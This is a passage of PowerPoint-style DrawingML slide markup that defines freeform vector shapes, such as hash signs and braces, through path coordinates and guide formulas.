                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 106 w 187"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 187"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 50 w 187"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 29 w 187"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 42 w 187"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 187"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 2 w 187"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 187"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 57 w 187"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 11 w 187"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 14 w 187"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 61 w 187"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 74 w 187"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 95 w 187"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 81 w 187"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 123 w 187"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 137 w 187"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 158 w 187"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 187"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 187 w 187"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 120 w 187"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 78 w 187"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 67 w 187"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 109 w 187"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 120 w 187"/>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20">
                    <a:moveTo>
                      <a:pt x="187" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="184" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="141" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="130" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="123" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="67"/>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2" name="Freeform 139"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4940"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Freeform 140"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5137" y="4022"/>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Freeform 141"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5286" y="4023"/>
                <a:ext cx="154"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Freeform 142"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5483"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Freeform 143"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5631"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7" name="Freeform 144"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5828" y="4022"/>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8" name="Freeform 145"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="5977"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Freeform 146"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6172" y="4023"/>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Freeform 147"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6356" y="4027"/>
                <a:ext cx="189" cy="220"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 189 w 189"/>
                  <a:gd name="T1" fmla="*/ 67 h 220"/>
                  <a:gd name="T2" fmla="*/ 185 w 189"/>
                  <a:gd name="T3" fmla="*/ 85 h 220"/>
                  <a:gd name="T4" fmla="*/ 142 w 189"/>
                  <a:gd name="T5" fmla="*/ 85 h 220"/>
                  <a:gd name="T6" fmla="*/ 131 w 189"/>
                  <a:gd name="T7" fmla="*/ 135 h 220"/>
                  <a:gd name="T8" fmla="*/ 178 w 189"/>
                  <a:gd name="T9" fmla="*/ 135 h 220"/>
                  <a:gd name="T10" fmla="*/ 174 w 189"/>
                  <a:gd name="T11" fmla="*/ 153 h 220"/>
                  <a:gd name="T12" fmla="*/ 128 w 189"/>
                  <a:gd name="T13" fmla="*/ 153 h 220"/>
                  <a:gd name="T14" fmla="*/ 113 w 189"/>
                  <a:gd name="T15" fmla="*/ 220 h 220"/>
                  <a:gd name="T16" fmla="*/ 92 w 189"/>
                  <a:gd name="T17" fmla="*/ 220 h 220"/>
                  <a:gd name="T18" fmla="*/ 107 w 189"/>
                  <a:gd name="T19" fmla="*/ 153 h 220"/>
                  <a:gd name="T20" fmla="*/ 64 w 189"/>
                  <a:gd name="T21" fmla="*/ 153 h 220"/>
                  <a:gd name="T22" fmla="*/ 51 w 189"/>
                  <a:gd name="T23" fmla="*/ 220 h 220"/>
                  <a:gd name="T24" fmla="*/ 30 w 189"/>
                  <a:gd name="T25" fmla="*/ 220 h 220"/>
                  <a:gd name="T26" fmla="*/ 44 w 189"/>
                  <a:gd name="T27" fmla="*/ 153 h 220"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 153 h 220"/>
                  <a:gd name="T30" fmla="*/ 3 w 189"/>
                  <a:gd name="T31" fmla="*/ 135 h 220"/>
                  <a:gd name="T32" fmla="*/ 47 w 189"/>
                  <a:gd name="T33" fmla="*/ 135 h 220"/>
                  <a:gd name="T34" fmla="*/ 58 w 189"/>
                  <a:gd name="T35" fmla="*/ 85 h 220"/>
                  <a:gd name="T36" fmla="*/ 12 w 189"/>
                  <a:gd name="T37" fmla="*/ 85 h 220"/>
                  <a:gd name="T38" fmla="*/ 15 w 189"/>
                  <a:gd name="T39" fmla="*/ 67 h 220"/>
                  <a:gd name="T40" fmla="*/ 62 w 189"/>
                  <a:gd name="T41" fmla="*/ 67 h 220"/>
                  <a:gd name="T42" fmla="*/ 75 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 220"/>
                  <a:gd name="T44" fmla="*/ 96 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 220"/>
                  <a:gd name="T46" fmla="*/ 83 w 189"/>
                  <a:gd name="T47" fmla="*/ 67 h 220"/>
                  <a:gd name="T48" fmla="*/ 124 w 189"/>
                  <a:gd name="T49" fmla="*/ 67 h 220"/>
                  <a:gd name="T50" fmla="*/ 139 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 220"/>
                  <a:gd name="T52" fmla="*/ 159 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 220"/>
                  <a:gd name="T54" fmla="*/ 145 w 189"/>
                  <a:gd name="T55" fmla="*/ 67 h 220"/>
                  <a:gd name="T56" fmla="*/ 189 w 189"/>
                  <a:gd name="T57" fmla="*/ 67 h 220"/>
                  <a:gd name="T58" fmla="*/ 122 w 189"/>
                  <a:gd name="T59" fmla="*/ 85 h 220"/>
                  <a:gd name="T60" fmla="*/ 79 w 189"/>
                  <a:gd name="T61" fmla="*/ 85 h 220"/>
                  <a:gd name="T62" fmla="*/ 68 w 189"/>
                  <a:gd name="T63" fmla="*/ 135 h 220"/>
                  <a:gd name="T64" fmla="*/ 111 w 189"/>
                  <a:gd name="T65" fmla="*/ 135 h 220"/>
                  <a:gd name="T66" fmla="*/ 122 w 189"/>
                  <a:gd name="T67" fmla="*/ 8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20">
                    <a:moveTo>
                      <a:pt x="189" y="67"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="185" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="131" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="128" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="153"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="124" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="145" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="189" y="67"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="122" y="85"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="79" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12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Freeform 148"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6574"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Freeform 149"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6769" y="4023"/>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Freeform 150"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6966"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4" name="Freeform 151"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7114" y="4023"/>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Freeform 152"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7312" y="4022"/>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Freeform 153"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7454" y="4027"/>
                <a:ext cx="76" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 241 h 241"/>
                  <a:gd name="T2" fmla="*/ 21 w 63"/>
                  <a:gd name="T3" fmla="*/ 199 h 241"/>
                  <a:gd name="T4" fmla="*/ 21 w 63"/>
                  <a:gd name="T5" fmla="*/ 158 h 241"/>
                  <a:gd name="T6" fmla="*/ 0 w 63"/>
                  <a:gd name="T7" fmla="*/ 129 h 241"/>
                  <a:gd name="T8" fmla="*/ 0 w 63"/>
                  <a:gd name="T9" fmla="*/ 113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7 w 63"/>
                  <a:gd name="T31" fmla="*/ 217 h 241"/>
                  <a:gd name="T32" fmla="*/ 63 w 63"/>
                  <a:gd name="T33" fmla="*/ 224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1"/>
                      <a:pt x="21" y="227"/>
                      <a:pt x="21" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                      <a:pt x="21" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="139"/>
                      <a:pt x="14" y="130"/>
                      <a:pt x="0" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                      <a:pt x="0" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="112"/>
                      <a:pt x="21" y="102"/>
                      <a:pt x="21" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                      <a:pt x="21" y="43"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="15"/>
                      <a:pt x="35" y="1"/>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7"/>
                      <a:pt x="42" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                      <a:pt x="42" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42" y="205"/>
                      <a:pt x="43" y="213"/>
                      <a:pt x="47" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="221"/>
                      <a:pt x="55" y="224"/>
                      <a:pt x="63" y="224"/>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Freeform 154"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7562" y="4027"/>
                <a:ext cx="77" cy="294"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 63"/>
                  <a:gd name="T1" fmla="*/ 129 h 241"/>
                  <a:gd name="T2" fmla="*/ 41 w 63"/>
                  <a:gd name="T3" fmla="*/ 158 h 241"/>
                  <a:gd name="T4" fmla="*/ 41 w 63"/>
                  <a:gd name="T5" fmla="*/ 199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9"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="130"/>
                      <a:pt x="41" y="139"/>
                      <a:pt x="41" y="158"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                      <a:pt x="41" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="227"/>
                      <a:pt x="27" y="241"/>
                      <a:pt x="0" y="241"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                      <a:pt x="0" y="224"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="224"/>
                      <a:pt x="13" y="221"/>
                      <a:pt x="16" y="217"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="20" y="213"/>
                      <a:pt x="21" y="205"/>
                      <a:pt x="21" y="195"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                      <a:pt x="21" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="21" y="137"/>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8" y="112"/>
                      <a:pt x="63" y="113"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="63"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Freeform 155"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="7669" y="4022"/>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Freeform 156"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2581" y="401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3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0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="172" y="171"/>
                      <a:pt x="174" y="172"/>
                      <a:pt x="175" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="176"/>
                      <a:pt x="179" y="180"/>
                      <a:pt x="176" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="173" y="186"/>
                      <a:pt x="170" y="187"/>
                      <a:pt x="166" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="157" y="193"/>
                      <a:pt x="148" y="199"/>
                      <a:pt x="141" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="208"/>
                      <a:pt x="137" y="208"/>
                      <a:pt x="134" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="131" y="209"/>
                      <a:pt x="128" y="209"/>
                      <a:pt x="125" y="208"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="122" y="207"/>
                      <a:pt x="119" y="206"/>
                      <a:pt x="118" y="203"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="199"/>
                      <a:pt x="113" y="198"/>
                      <a:pt x="110" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="198"/>
                      <a:pt x="90" y="198"/>
                      <a:pt x="81" y="198"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="198"/>
                      <a:pt x="72" y="199"/>
                      <a:pt x="68" y="201"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="203"/>
                      <a:pt x="64" y="204"/>
                      <a:pt x="63" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="208"/>
                      <a:pt x="54" y="209"/>
                      <a:pt x="48" y="207"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="205"/>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5" y="176"/>
                      <a:pt x="3" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="170"/>
                      <a:pt x="2" y="168"/>
                      <a:pt x="2" y="166"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="162"/>
                      <a:pt x="3" y="160"/>
                      <a:pt x="7" y="160"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="160"/>
                      <a:pt x="12" y="159"/>
                      <a:pt x="14" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="158"/>
                      <a:pt x="22" y="155"/>
                      <a:pt x="23" y="150"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="150"/>
                      <a:pt x="23" y="149"/>
                      <a:pt x="23" y="149"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="153"/>
                      <a:pt x="23" y="160"/>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80"/>
                      <a:pt x="6" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="185"/>
                      <a:pt x="5" y="186"/>
                      <a:pt x="5" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="190"/>
                      <a:pt x="4" y="191"/>
                      <a:pt x="7" y="192"/>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0"/>
                      <a:pt x="42" y="152"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="149"/>
                      <a:pt x="37" y="147"/>
                      <a:pt x="35" y="145"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="143"/>
                      <a:pt x="30" y="143"/>
                      <a:pt x="27" y="144"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="145"/>
                      <a:pt x="25" y="145"/>
                      <a:pt x="25" y="143"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="140"/>
                      <a:pt x="24" y="137"/>
                      <a:pt x="25" y="134"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="26" y="132"/>
                      <a:pt x="26" y="131"/>
                      <a:pt x="27" y="130"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="125"/>
                      <a:pt x="33" y="118"/>
                      <a:pt x="35" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="106"/>
                      <a:pt x="39" y="100"/>
                      <a:pt x="43" y="94"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="90"/>
                      <a:pt x="49" y="87"/>
                      <a:pt x="52" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="80"/>
                      <a:pt x="56" y="76"/>
                      <a:pt x="58" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="70"/>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3"/>
                      <a:pt x="122" y="30"/>
                      <a:pt x="122" y="36"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="40"/>
                      <a:pt x="122" y="43"/>
                      <a:pt x="123" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="61"/>
                      <a:pt x="128" y="74"/>
                      <a:pt x="139"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4" y="160"/>
                      <a:pt x="139" y="161"/>
                      <a:pt x="135" y="159"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="133" y="159"/>
                      <a:pt x="132" y="157"/>
                      <a:pt x="131" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="154"/>
                      <a:pt x="129" y="152"/>
                      <a:pt x="128" y="150"/>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2" y="189"/>
                      <a:pt x="121" y="191"/>
                      <a:pt x="122" y="194"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="201"/>
                      <a:pt x="129" y="205"/>
                      <a:pt x="136" y="202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="139" y="201"/>
                      <a:pt x="142" y="199"/>
                      <a:pt x="145" y="197"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="192"/>
                      <a:pt x="158" y="189"/>
                      <a:pt x="165" y="186"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="185"/>
                      <a:pt x="171" y="184"/>
                      <a:pt x="173" y="182"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="182"/>
                      <a:pt x="174" y="181"/>
                      <a:pt x="175" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="176" y="180"/>
                      <a:pt x="176" y="178"/>
                      <a:pt x="175" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="174" y="176"/>
                      <a:pt x="172" y="175"/>
                      <a:pt x="171" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="173"/>
                      <a:pt x="169" y="173"/>
                      <a:pt x="168" y="172"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="163" y="171"/>
                      <a:pt x="161" y="168"/>
                      <a:pt x="160" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="160"/>
                      <a:pt x="160" y="158"/>
                      <a:pt x="160" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="160" y="154"/>
                      <a:pt x="160" y="154"/>
                      <a:pt x="161" y="153"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="71" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                      <a:pt x="71" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="71"/>
                      <a:pt x="74" y="73"/>
                      <a:pt x="77" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81" y="74"/>
                      <a:pt x="85" y="73"/>
                      <a:pt x="88" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="70"/>
                      <a:pt x="94" y="68"/>
                      <a:pt x="98" y="67"/>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2"/>
                      <a:pt x="37" y="122"/>
                      <a:pt x="37" y="123"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="127"/>
                      <a:pt x="35" y="131"/>
                      <a:pt x="37" y="135"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="37" y="138"/>
                      <a:pt x="38" y="140"/>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7"/>
                      <a:pt x="63" y="178"/>
                      <a:pt x="62" y="178"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="180"/>
                      <a:pt x="65" y="181"/>
                      <a:pt x="66" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="186"/>
